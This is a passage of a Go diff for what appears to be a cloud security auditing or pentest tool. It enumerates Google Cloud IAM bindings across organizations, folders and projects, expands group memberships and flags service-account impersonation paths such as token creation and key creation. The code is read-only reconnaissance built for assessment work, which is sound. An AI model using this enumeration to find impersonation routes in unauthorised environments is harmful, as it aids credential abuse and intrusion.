+ var client *resourcemanager.FoldersClient + var err error + if s.session != nil { + client, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + policyFailureCache[cacheKey] = true + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + resourceName = "folders/" + resourceID + policy, err := client.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{Resource: resourceName}) + if err != nil { + policyFailureCache[cacheKey] = true + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + bindings := convertPolicyToBindings(policy, resourceID, resourceType, resourceName) + policyCache[cacheKey] = bindings + return bindings, nil + + case "organization": + var client *resourcemanager.OrganizationsClient + var err error + if s.session != nil { + client, err = resourcemanager.NewOrganizationsClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewOrganizationsClient(ctx) + } + if err != nil { + policyFailureCache[cacheKey] = true + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + resourceName = "organizations/" + resourceID + policy, err := client.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{Resource: resourceName}) + if err != nil { + policyFailureCache[cacheKey] = true + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + bindings := convertPolicyToBindings(policy, resourceID, resourceType, resourceName) + policyCache[cacheKey] = bindings + return bindings, nil + + default: + return nil, fmt.Errorf("unsupported resource type: %s", resourceType) + } +} + +// convertPolicyToBindings converts an IAM policy to PolicyBinding slice +func convertPolicyToBindings(policy *iampb.Policy, resourceID, resourceType, resourceName string) []PolicyBinding { + var 
bindings []PolicyBinding + for _, binding := range policy.Bindings { + pb := PolicyBinding{ + Role: binding.Role, + Members: binding.Members, + ResourceID: resourceID, + ResourceType: resourceType, + PolicyName: resourceName + "_policyBindings", + } + + // Parse condition if present + if binding.Condition != nil { + pb.Condition = binding.Condition.String() + pb.HasCondition = true + pb.ConditionInfo = &IAMCondition{ + Title: binding.Condition.Title, + Description: binding.Condition.Description, + Expression: binding.Condition.Expression, + } + } + + bindings = append(bindings, pb) + } + return bindings +} + +// CombinedIAM retrieves all IAM-related data for a project +func (s *IAMService) CombinedIAM(projectID string) (CombinedIAMData, error) { + var data CombinedIAMData + + // Get principals with roles (includes inheritance tracking) + principals, err := s.PrincipalsWithRolesEnhanced(projectID) + if err != nil { + return data, fmt.Errorf("failed to get principals: %v", err) + } + data.Principals = principals + + // Get service accounts with details + serviceAccounts, err := s.ServiceAccounts(projectID) + if err != nil { + // Don't fail completely + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + "Could not get service accounts") + } else { + data.ServiceAccounts = serviceAccounts + } + + // Get custom roles + customRoles, err := s.CustomRoles(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + "Could not get custom roles") + } else { + data.CustomRoles = customRoles + } + + // Extract groups from principals + var groups []GroupInfo + groupMap := make(map[string]*GroupInfo) + for _, p := range principals { + if p.Type == "Group" { + if _, exists := groupMap[p.Email]; !exists { + groupMap[p.Email] = &GroupInfo{ + Email: p.Email, + ProjectID: projectID, + Roles: []string{}, + } + } + for _, binding := range p.PolicyBindings { + groupMap[p.Email].Roles = append(groupMap[p.Email].Roles, 
binding.Role) + } + } + } + for _, g := range groupMap { + groups = append(groups, *g) + } + data.Groups = groups + + return data, nil +} + +// PrincipalsWithRolesEnhanced gets principals with roles including inheritance info +func (s *IAMService) PrincipalsWithRolesEnhanced(projectID string) ([]PrincipalWithRoles, error) { + policyBindings, err := s.PoliciesWithInheritance(projectID) + if err != nil { + return nil, err + } + + principalMap := make(map[string]*PrincipalWithRoles) + for _, pb := range policyBindings { + for _, member := range pb.Members { + principalType := determinePrincipalType(member) + // Create a binding copy for this principal + principalBinding := PolicyBinding{ + Role: pb.Role, + Members: []string{member}, + ResourceID: pb.ResourceID, + ResourceType: pb.ResourceType, + Condition: pb.Condition, + PolicyName: pb.PolicyName, + IsInherited: pb.IsInherited, + InheritedFrom: pb.InheritedFrom, + } + + if principal, ok := principalMap[member]; ok { + principal.PolicyBindings = append(principal.PolicyBindings, principalBinding) + // Track custom roles + if isCustomRole(pb.Role) && !contains(principal.CustomRoles, pb.Role) { + principal.CustomRoles = append(principal.CustomRoles, pb.Role) + principal.HasCustomRoles = true + } + } else { + customRoles := []string{} + hasCustomRoles := false + if isCustomRole(pb.Role) { + customRoles = append(customRoles, pb.Role) + hasCustomRoles = true + } + principalMap[member] = &PrincipalWithRoles{ + Name: member, + Type: principalType, + Email: extractEmail(member), + PolicyBindings: []PolicyBinding{principalBinding}, + ResourceID: projectID, + ResourceType: "project", + HasCustomRoles: hasCustomRoles, + CustomRoles: customRoles, } } } @@ -187,3 +809,1057 @@ func (s *IAMService) PrincipalsWithRoles(resourceID string, resourceType string) return principals, nil } + +// GetMemberType returns the member type for display purposes +func GetMemberType(member string) string { + return determinePrincipalType(member) +} + 
+// PermissionEntry represents a single permission with its source information +type PermissionEntry struct { + Permission string `json:"permission"` + Role string `json:"role"` + RoleType string `json:"roleType"` // "predefined", "custom", "basic" + ResourceID string `json:"resourceId"` + ResourceType string `json:"resourceType"` + IsInherited bool `json:"isInherited"` + InheritedFrom string `json:"inheritedFrom"` + HasCondition bool `json:"hasCondition"` + Condition string `json:"condition"` +} + +// EntityPermissions represents all permissions for an entity +type EntityPermissions struct { + Entity string `json:"entity"` + EntityType string `json:"entityType"` + Email string `json:"email"` + ProjectID string `json:"projectId"` + Permissions []PermissionEntry `json:"permissions"` + Roles []string `json:"roles"` + TotalPerms int `json:"totalPerms"` + UniquePerms int `json:"uniquePerms"` +} + +// RolePermissions caches role to permissions mapping +var rolePermissionsCache = make(map[string][]string) + +// rolePermissionsFailureCache tracks roles we've already failed to look up (to avoid duplicate error logs) +var rolePermissionsFailureCache = make(map[string]bool) + +// GetRolePermissions retrieves the permissions for a given role +func (s *IAMService) GetRolePermissions(ctx context.Context, roleName string) ([]string, error) { + // Check cache first + if perms, ok := rolePermissionsCache[roleName]; ok { + return perms, nil + } + + // Check if we've already failed to look up this role + if rolePermissionsFailureCache[roleName] { + return nil, gcpinternal.ErrPermissionDenied + } + + var iamService *iam.Service + var err error + if s.session != nil { + iamService, err = iam.NewService(ctx, s.session.GetClientOption()) + } else { + iamService, err = iam.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var permissions []string + + // Handle different role types + if strings.HasPrefix(roleName, "roles/") { 
+ // Predefined role + role, err := iamService.Roles.Get(roleName).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + permissions = role.IncludedPermissions + } else if strings.HasPrefix(roleName, "projects/") { + // Project-level custom role + role, err := iamService.Projects.Roles.Get(roleName).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + permissions = role.IncludedPermissions + } else if strings.HasPrefix(roleName, "organizations/") { + // Organization-level custom role + role, err := iamService.Organizations.Roles.Get(roleName).Context(ctx).Do() + if err != nil { + // Cache the failure to avoid repeated error logs + rolePermissionsFailureCache[roleName] = true + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + permissions = role.IncludedPermissions + } + + // Cache the result + rolePermissionsCache[roleName] = permissions + return permissions, nil +} + +// GetRoleType determines the type of role +func GetRoleType(roleName string) string { + switch { + case strings.HasPrefix(roleName, "roles/owner") || strings.HasPrefix(roleName, "roles/editor") || strings.HasPrefix(roleName, "roles/viewer"): + return "basic" + case strings.HasPrefix(roleName, "projects/") || strings.HasPrefix(roleName, "organizations/"): + return "custom" + default: + return "predefined" + } +} + +// GetEntityPermissions retrieves all permissions for a specific entity +func (s *IAMService) GetEntityPermissions(ctx context.Context, projectID string, entity string) (*EntityPermissions, error) { + // Get all bindings with inheritance + bindings, err := s.PoliciesWithInheritance(projectID) + if err != nil { + return nil, err + } + + entityPerms := &EntityPermissions{ + Entity: entity, + EntityType: determinePrincipalType(entity), + Email: extractEmail(entity), + ProjectID: projectID, + Permissions: []PermissionEntry{}, + Roles: []string{}, + } + + // Track 
unique permissions + uniquePerms := make(map[string]bool) + rolesSet := make(map[string]bool) + + // Process each binding + for _, binding := range bindings { + // Check if this entity is in the binding + found := false + for _, member := range binding.Members { + if member == entity { + found = true + break + } + } + if !found { + continue + } + + // Track the role + if !rolesSet[binding.Role] { + rolesSet[binding.Role] = true + entityPerms.Roles = append(entityPerms.Roles, binding.Role) + } + + // Get permissions for this role + permissions, err := s.GetRolePermissions(ctx, binding.Role) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get permissions for role %s", binding.Role)) + continue + } + + // Create permission entries + for _, perm := range permissions { + permEntry := PermissionEntry{ + Permission: perm, + Role: binding.Role, + RoleType: GetRoleType(binding.Role), + ResourceID: binding.ResourceID, + ResourceType: binding.ResourceType, + IsInherited: binding.IsInherited, + InheritedFrom: binding.InheritedFrom, + HasCondition: binding.HasCondition, + } + if binding.ConditionInfo != nil { + permEntry.Condition = binding.ConditionInfo.Title + } + + entityPerms.Permissions = append(entityPerms.Permissions, permEntry) + + if !uniquePerms[perm] { + uniquePerms[perm] = true + } + } + } + + entityPerms.TotalPerms = len(entityPerms.Permissions) + entityPerms.UniquePerms = len(uniquePerms) + + return entityPerms, nil +} + +// GetAllEntityPermissions retrieves permissions for all entities in a project +func (s *IAMService) GetAllEntityPermissions(projectID string) ([]EntityPermissions, error) { + ctx := context.Background() + + // Get all principals + principals, err := s.PrincipalsWithRolesEnhanced(projectID) + if err != nil { + return nil, err + } + + var allPerms []EntityPermissions + + for _, principal := range principals { + entityPerms, err := s.GetEntityPermissions(ctx, projectID, 
principal.Name) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get permissions for %s", principal.Name)) + continue + } + allPerms = append(allPerms, *entityPerms) + } + + return allPerms, nil +} + +// GetGroupMembership retrieves members of a Google Group using Cloud Identity API +// Requires cloudidentity.groups.readonly or cloudidentity.groups scope +func (s *IAMService) GetGroupMembership(ctx context.Context, groupEmail string) (*GroupInfo, error) { + var ciService *cloudidentity.Service + var err error + if s.session != nil { + ciService, err = cloudidentity.NewService(ctx, s.session.GetClientOption()) + } else { + ciService, err = cloudidentity.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + } + + groupInfo := &GroupInfo{ + Email: groupEmail, + Members: []GroupMember{}, + } + + // First, look up the group to get its resource name + // Cloud Identity uses groups/{group_id} format + lookupReq := ciService.Groups.Lookup() + lookupReq.GroupKeyId(groupEmail) + + lookupResp, err := lookupReq.Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + } + + groupName := lookupResp.Name + + // Get group details + group, err := ciService.Groups.Get(groupName).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + } + + groupInfo.DisplayName = group.DisplayName + groupInfo.Description = group.Description + + // List memberships + membershipsReq := ciService.Groups.Memberships.List(groupName) + err = membershipsReq.Pages(ctx, func(page *cloudidentity.ListMembershipsResponse) error { + for _, membership := range page.Memberships { + member := GroupMember{ + Role: membership.Roles[0].Name, // OWNER, MANAGER, MEMBER + } + + // Get member details from preferredMemberKey + if membership.PreferredMemberKey != nil { + member.Email = 
membership.PreferredMemberKey.Id + } + + // Determine member type + if membership.Type == "GROUP" { + member.Type = "GROUP" + groupInfo.NestedGroups = append(groupInfo.NestedGroups, member.Email) + groupInfo.HasNestedGroups = true + } else if strings.HasSuffix(member.Email, ".iam.gserviceaccount.com") { + member.Type = "SERVICE_ACCOUNT" + } else { + member.Type = "USER" + } + + groupInfo.Members = append(groupInfo.Members, member) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + } + + groupInfo.MemberCount = len(groupInfo.Members) + groupInfo.MembershipEnumerated = true + + return groupInfo, nil +} + +// GetGroupMemberships retrieves members for all groups found in IAM bindings +func (s *IAMService) GetGroupMemberships(ctx context.Context, groups []GroupInfo) []GroupInfo { + var enrichedGroups []GroupInfo + + for _, group := range groups { + enrichedGroup, err := s.GetGroupMembership(ctx, group.Email) + if err != nil { + // Log but don't fail - Cloud Identity API access is often restricted + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not enumerate membership for group %s", group.Email)) + // Keep the original group info without membership + group.MembershipEnumerated = false + enrichedGroups = append(enrichedGroups, group) + continue + } + // Preserve the roles from the original group + enrichedGroup.Roles = group.Roles + enrichedGroup.ProjectID = group.ProjectID + enrichedGroups = append(enrichedGroups, *enrichedGroup) + } + + return enrichedGroups +} + +// ExpandGroupPermissions expands permissions to include inherited permissions from group membership +// This creates permission entries for group members based on the group's permissions +func (s *IAMService) ExpandGroupPermissions(ctx context.Context, projectID string, entityPerms []EntityPermissions) ([]EntityPermissions, error) { + // Find all groups in the entity permissions + groupPermsMap := 
make(map[string]*EntityPermissions) + for i := range entityPerms { + if entityPerms[i].EntityType == "Group" { + groupPermsMap[entityPerms[i].Entity] = &entityPerms[i] + } + } + + if len(groupPermsMap) == 0 { + return entityPerms, nil + } + + // Try to enumerate group memberships + var groupInfos []GroupInfo + for groupEmail := range groupPermsMap { + groupInfos = append(groupInfos, GroupInfo{Email: groupEmail, ProjectID: projectID}) + } + + enrichedGroups := s.GetGroupMemberships(ctx, groupInfos) + + // Create a map of member to their inherited permissions from groups + memberInheritedPerms := make(map[string][]PermissionEntry) + + for _, group := range enrichedGroups { + if !group.MembershipEnumerated { + continue + } + + groupPerms := groupPermsMap["group:"+group.Email] + if groupPerms == nil { + continue + } + + // For each member of the group, add the group's permissions as inherited + for _, member := range group.Members { + memberKey := "" + switch member.Type { + case "USER": + memberKey = "user:" + member.Email + case "SERVICE_ACCOUNT": + memberKey = "serviceAccount:" + member.Email + case "GROUP": + memberKey = "group:" + member.Email + } + + if memberKey == "" { + continue + } + + // Create inherited permission entries + for _, perm := range groupPerms.Permissions { + inheritedPerm := PermissionEntry{ + Permission: perm.Permission, + Role: perm.Role, + RoleType: perm.RoleType, + ResourceID: perm.ResourceID, + ResourceType: perm.ResourceType, + IsInherited: true, + InheritedFrom: fmt.Sprintf("group:%s", group.Email), + HasCondition: perm.HasCondition, + Condition: perm.Condition, + } + memberInheritedPerms[memberKey] = append(memberInheritedPerms[memberKey], inheritedPerm) + } + } + } + + // Add inherited permissions to existing entities or create new ones + entityMap := make(map[string]*EntityPermissions) + for i := range entityPerms { + entityMap[entityPerms[i].Entity] = &entityPerms[i] + } + + for memberKey, inheritedPerms := range memberInheritedPerms 
{ + if existing, ok := entityMap[memberKey]; ok { + // Add inherited permissions to existing entity + existing.Permissions = append(existing.Permissions, inheritedPerms...) + existing.TotalPerms = len(existing.Permissions) + // Recalculate unique perms + uniquePerms := make(map[string]bool) + for _, p := range existing.Permissions { + uniquePerms[p.Permission] = true + } + existing.UniquePerms = len(uniquePerms) + } else { + // Create new entity entry for this group member + newEntity := EntityPermissions{ + Entity: memberKey, + EntityType: determinePrincipalType(memberKey), + Email: extractEmail(memberKey), + ProjectID: projectID, + Permissions: inheritedPerms, + Roles: []string{}, // Roles are inherited via group + TotalPerms: len(inheritedPerms), + } + // Calculate unique perms + uniquePerms := make(map[string]bool) + for _, p := range inheritedPerms { + uniquePerms[p.Permission] = true + } + newEntity.UniquePerms = len(uniquePerms) + entityPerms = append(entityPerms, newEntity) + } + } + + return entityPerms, nil +} + +// GetAllEntityPermissionsWithGroupExpansion retrieves permissions with group membership expansion +func (s *IAMService) GetAllEntityPermissionsWithGroupExpansion(projectID string) ([]EntityPermissions, []GroupInfo, error) { + ctx := context.Background() + + // Get base permissions + entityPerms, err := s.GetAllEntityPermissions(projectID) + if err != nil { + return nil, nil, err + } + + // Find groups + var groups []GroupInfo + for _, ep := range entityPerms { + if ep.EntityType == "Group" { + groups = append(groups, GroupInfo{ + Email: ep.Email, + ProjectID: projectID, + Roles: ep.Roles, + }) + } + } + + // Try to enumerate group memberships + enrichedGroups := s.GetGroupMemberships(ctx, groups) + + // Expand permissions based on group membership + expandedPerms, err := s.ExpandGroupPermissions(ctx, projectID, entityPerms) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + "Could not expand group 
permissions") + return entityPerms, enrichedGroups, nil + } + + return expandedPerms, enrichedGroups, nil +} + +// ============================================================================ +// PENTEST: Service Account Impersonation Analysis +// ============================================================================ + +// Dangerous permissions for SA impersonation/abuse +var saImpersonationPermissions = map[string]string{ + "iam.serviceAccounts.getAccessToken": "tokenCreator", + "iam.serviceAccountKeys.create": "keyCreator", + "iam.serviceAccounts.signBlob": "signBlob", + "iam.serviceAccounts.signJwt": "signJwt", + "iam.serviceAccounts.implicitDelegation": "implicitDelegation", + "iam.serviceAccounts.actAs": "actAs", +} + +// GetServiceAccountIAMPolicy gets the IAM policy for a specific service account +func (s *IAMService) GetServiceAccountIAMPolicy(ctx context.Context, saEmail string, projectID string) (*SAImpersonationInfo, error) { + var iamService *iam.Service + var err error + + if s.session != nil { + iamService, err = iam.NewService(ctx, s.session.GetClientOption()) + } else { + iamService, err = iam.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + saResource := fmt.Sprintf("projects/%s/serviceAccounts/%s", projectID, saEmail) + + policy, err := iamService.Projects.ServiceAccounts.GetIamPolicy(saResource).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + info := &SAImpersonationInfo{ + ServiceAccount: saEmail, + ProjectID: projectID, + RiskReasons: []string{}, + } + + // Analyze each binding + for _, binding := range policy.Bindings { + role := binding.Role + members := binding.Members + + // Check for specific dangerous roles + switch role { + case "roles/iam.serviceAccountTokenCreator": + info.TokenCreators = append(info.TokenCreators, members...) 
+ case "roles/iam.serviceAccountKeyAdmin": + info.KeyCreators = append(info.KeyCreators, members...) + info.SAAdmins = append(info.SAAdmins, members...) + case "roles/iam.serviceAccountAdmin": + info.SAAdmins = append(info.SAAdmins, members...) + info.TokenCreators = append(info.TokenCreators, members...) + info.KeyCreators = append(info.KeyCreators, members...) + case "roles/iam.serviceAccountUser": + info.ActAsUsers = append(info.ActAsUsers, members...) + case "roles/owner", "roles/editor": + // These grant broad SA access + info.SAAdmins = append(info.SAAdmins, members...) + } + } + + // Calculate risk level + info.RiskLevel, info.RiskReasons = calculateSAImpersonationRisk(info) + + return info, nil +} + +// GetAllServiceAccountImpersonation analyzes impersonation risks for all SAs in a project +func (s *IAMService) GetAllServiceAccountImpersonation(projectID string) ([]SAImpersonationInfo, error) { + ctx := context.Background() + + // Get all service accounts + serviceAccounts, err := s.ServiceAccounts(projectID) + if err != nil { + return nil, err + } + + var results []SAImpersonationInfo + + for _, sa := range serviceAccounts { + info, err := s.GetServiceAccountIAMPolicy(ctx, sa.Email, projectID) + if err != nil { + // Log but don't fail - we might not have permission + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get IAM policy for SA %s", sa.Email)) + continue + } + results = append(results, *info) + } + + return results, nil +} + +// ServiceAccountsWithImpersonation returns service accounts with impersonation analysis +func (s *IAMService) ServiceAccountsWithImpersonation(projectID string) ([]ServiceAccountInfo, error) { + ctx := context.Background() + + // Get base service account info + serviceAccounts, err := s.ServiceAccounts(projectID) + if err != nil { + return nil, err + } + + // Enrich with impersonation info + for i := range serviceAccounts { + sa := &serviceAccounts[i] + + info, err := 
s.GetServiceAccountIAMPolicy(ctx, sa.Email, projectID) + if err != nil { + // Log but continue + continue + } + + // Populate impersonation fields + sa.CanGetAccessTokenBy = info.TokenCreators + sa.CanCreateKeysBy = info.KeyCreators + sa.CanSignBlobBy = info.SignBlobUsers + sa.CanSignJwtBy = info.SignJwtUsers + + // Combine all impersonation paths + allImpersonators := make(map[string]bool) + for _, m := range info.TokenCreators { + allImpersonators[m] = true + } + for _, m := range info.KeyCreators { + allImpersonators[m] = true + } + for _, m := range info.SignBlobUsers { + allImpersonators[m] = true + } + for _, m := range info.SignJwtUsers { + allImpersonators[m] = true + } + for _, m := range info.SAAdmins { + allImpersonators[m] = true + } + + for m := range allImpersonators { + sa.CanBeImpersonatedBy = append(sa.CanBeImpersonatedBy, m) + } + + sa.HasImpersonationRisk = len(sa.CanBeImpersonatedBy) > 0 + sa.ImpersonationRiskLevel = info.RiskLevel + } + + return serviceAccounts, nil +} + +func calculateSAImpersonationRisk(info *SAImpersonationInfo) (string, []string) { + var reasons []string + score := 0 + + // Token creators are critical - direct impersonation + if len(info.TokenCreators) > 0 { + reasons = append(reasons, fmt.Sprintf("%d principal(s) can get access tokens (impersonate)", len(info.TokenCreators))) + score += 3 + + // Check for public access + for _, m := range info.TokenCreators { + if m == "allUsers" || m == "allAuthenticatedUsers" { + reasons = append(reasons, "PUBLIC can impersonate this SA!") + score += 5 + } + } + } + + // Key creators are critical - persistent access + if len(info.KeyCreators) > 0 { + reasons = append(reasons, fmt.Sprintf("%d principal(s) can create keys (persistent access)", len(info.KeyCreators))) + score += 3 + + for _, m := range info.KeyCreators { + if m == "allUsers" || m == "allAuthenticatedUsers" { + reasons = append(reasons, "PUBLIC can create keys for this SA!") + score += 5 + } + } + } + + // SignBlob/SignJwt - 
can forge tokens + if len(info.SignBlobUsers) > 0 || len(info.SignJwtUsers) > 0 { + reasons = append(reasons, "Principals can sign blobs/JWTs (token forgery)") + score += 2 + } + + // SA Admins + if len(info.SAAdmins) > 0 { + reasons = append(reasons, fmt.Sprintf("%d SA admin(s)", len(info.SAAdmins))) + score += 1 + } + + // ActAs users (needed for attaching SA to resources) + if len(info.ActAsUsers) > 0 { + reasons = append(reasons, fmt.Sprintf("%d principal(s) can actAs this SA", len(info.ActAsUsers))) + score += 1 + } + + if score >= 5 { + return "CRITICAL", reasons + } else if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +// ============================================================================ +// Organization and Folder IAM Enumeration +// ============================================================================ + +// ScopeBinding represents an IAM binding with full scope information +type ScopeBinding struct { + ScopeType string `json:"scopeType"` // organization, folder, project + ScopeID string `json:"scopeId"` // The ID of the scope + ScopeName string `json:"scopeName"` // Display name of the scope + Member string `json:"member"` // Full member identifier + MemberType string `json:"memberType"` // User, ServiceAccount, Group, etc. 
+ MemberEmail string `json:"memberEmail"` // Clean email + Role string `json:"role"` + IsCustom bool `json:"isCustom"` + HasCondition bool `json:"hasCondition"` + ConditionInfo *IAMCondition `json:"conditionInfo"` +} + +// OrgFolderIAMData holds IAM bindings from organizations and folders +type OrgFolderIAMData struct { + Organizations []ScopeBinding `json:"organizations"` + Folders []ScopeBinding `json:"folders"` + OrgNames map[string]string `json:"orgNames"` // orgID -> displayName + FolderNames map[string]string `json:"folderNames"` // folderID -> displayName +} + +// GetOrganizationIAM gets IAM bindings for all accessible organizations +func (s *IAMService) GetOrganizationIAM(ctx context.Context) ([]ScopeBinding, map[string]string, error) { + var bindings []ScopeBinding + orgNames := make(map[string]string) + + // First, search for accessible organizations + var orgsClient *resourcemanager.OrganizationsClient + var err error + if s.session != nil { + orgsClient, err = resourcemanager.NewOrganizationsClient(ctx, s.session.GetClientOption()) + } else { + orgsClient, err = resourcemanager.NewOrganizationsClient(ctx) + } + if err != nil { + return nil, orgNames, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer orgsClient.Close() + + // Search for organizations + searchReq := &resourcemanagerpb.SearchOrganizationsRequest{} + it := orgsClient.SearchOrganizations(ctx, searchReq) + for { + org, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + // Log the error - likely permission denied for organization search + parsedErr := gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_IAM_MODULE_NAME, "Could not search organizations") + break + } + + orgID := strings.TrimPrefix(org.Name, "organizations/") + orgNames[orgID] = org.DisplayName + + // Get IAM policy for this organization + policy, err := orgsClient.GetIamPolicy(ctx, 
&iampb.GetIamPolicyRequest{ + Resource: org.Name, + }) + if err != nil { + continue + } + + // Convert policy to scope bindings + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + sb := ScopeBinding{ + ScopeType: "organization", + ScopeID: orgID, + ScopeName: org.DisplayName, + Member: member, + MemberType: determinePrincipalType(member), + MemberEmail: extractEmail(member), + Role: binding.Role, + IsCustom: isCustomRole(binding.Role), + } + if binding.Condition != nil { + sb.HasCondition = true + sb.ConditionInfo = &IAMCondition{ + Title: binding.Condition.Title, + Description: binding.Condition.Description, + Expression: binding.Condition.Expression, + } + } + bindings = append(bindings, sb) + } + } + } + + return bindings, orgNames, nil +} + +// GetFolderIAM gets IAM bindings for all accessible folders +func (s *IAMService) GetFolderIAM(ctx context.Context) ([]ScopeBinding, map[string]string, error) { + var bindings []ScopeBinding + folderNames := make(map[string]string) + + var foldersClient *resourcemanager.FoldersClient + var err error + if s.session != nil { + foldersClient, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + foldersClient, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + return nil, folderNames, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer foldersClient.Close() + + // Search for all folders + searchReq := &resourcemanagerpb.SearchFoldersRequest{} + it := foldersClient.SearchFolders(ctx, searchReq) + for { + folder, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + // Log the error - likely permission denied for folder search + parsedErr := gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_IAM_MODULE_NAME, "Could not search folders") + break + } + + folderID := strings.TrimPrefix(folder.Name, "folders/") + 
folderNames[folderID] = folder.DisplayName + + // Get IAM policy for this folder + policy, err := foldersClient.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{ + Resource: folder.Name, + }) + if err != nil { + continue + } + + // Convert policy to scope bindings + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + sb := ScopeBinding{ + ScopeType: "folder", + ScopeID: folderID, + ScopeName: folder.DisplayName, + Member: member, + MemberType: determinePrincipalType(member), + MemberEmail: extractEmail(member), + Role: binding.Role, + IsCustom: isCustomRole(binding.Role), + } + if binding.Condition != nil { + sb.HasCondition = true + sb.ConditionInfo = &IAMCondition{ + Title: binding.Condition.Title, + Description: binding.Condition.Description, + Expression: binding.Condition.Expression, + } + } + bindings = append(bindings, sb) + } + } + } + + return bindings, folderNames, nil +} + +// GetAllScopeIAM gets IAM bindings from organizations, folders, and projects +func (s *IAMService) GetAllScopeIAM(ctx context.Context, projectIDs []string, projectNames map[string]string) ([]ScopeBinding, error) { + var allBindings []ScopeBinding + + // Get organization IAM + orgBindings, _, err := s.GetOrganizationIAM(ctx) + if err != nil { + // Log but continue - we might not have org access + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, "Could not enumerate organization IAM") + } else { + allBindings = append(allBindings, orgBindings...) + } + + // Get folder IAM + folderBindings, _, err := s.GetFolderIAM(ctx) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, "Could not enumerate folder IAM") + } else { + allBindings = append(allBindings, folderBindings...) 
+ } + + // Get project IAM for each project + for _, projectID := range projectIDs { + projectBindings, err := s.Policies(projectID, "project") + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not enumerate IAM for project %s", projectID)) + continue + } + + projectName := projectID + if name, ok := projectNames[projectID]; ok { + projectName = name + } + + for _, pb := range projectBindings { + for _, member := range pb.Members { + sb := ScopeBinding{ + ScopeType: "project", + ScopeID: projectID, + ScopeName: projectName, + Member: member, + MemberType: determinePrincipalType(member), + MemberEmail: extractEmail(member), + Role: pb.Role, + IsCustom: isCustomRole(pb.Role), + } + if pb.HasCondition && pb.ConditionInfo != nil { + sb.HasCondition = true + sb.ConditionInfo = pb.ConditionInfo + } + allBindings = append(allBindings, sb) + } + } + } + + return allBindings, nil +} + +// ============================================================================ +// MFA Status Lookup via Cloud Identity API +// ============================================================================ + +// MFAStatus represents the MFA status for a user +type MFAStatus struct { + Email string `json:"email"` + HasMFA bool `json:"hasMfa"` + MFAType string `json:"mfaType"` // 2SV method type + Enrolled bool `json:"enrolled"` // Whether 2SV is enrolled + Enforced bool `json:"enforced"` // Whether 2SV is enforced by policy + LastUpdate string `json:"lastUpdate"` + Error string `json:"error"` // Error message if lookup failed +} + +// GetUserMFAStatus attempts to get MFA status for a user via Cloud Identity API +// This requires cloudidentity.users.get or admin.directory.users.get permission +func (s *IAMService) GetUserMFAStatus(ctx context.Context, email string) (*MFAStatus, error) { + status := &MFAStatus{ + Email: email, + } + + // Cloud Identity doesn't directly expose 2SV status + // We need to use the Admin SDK Directory API 
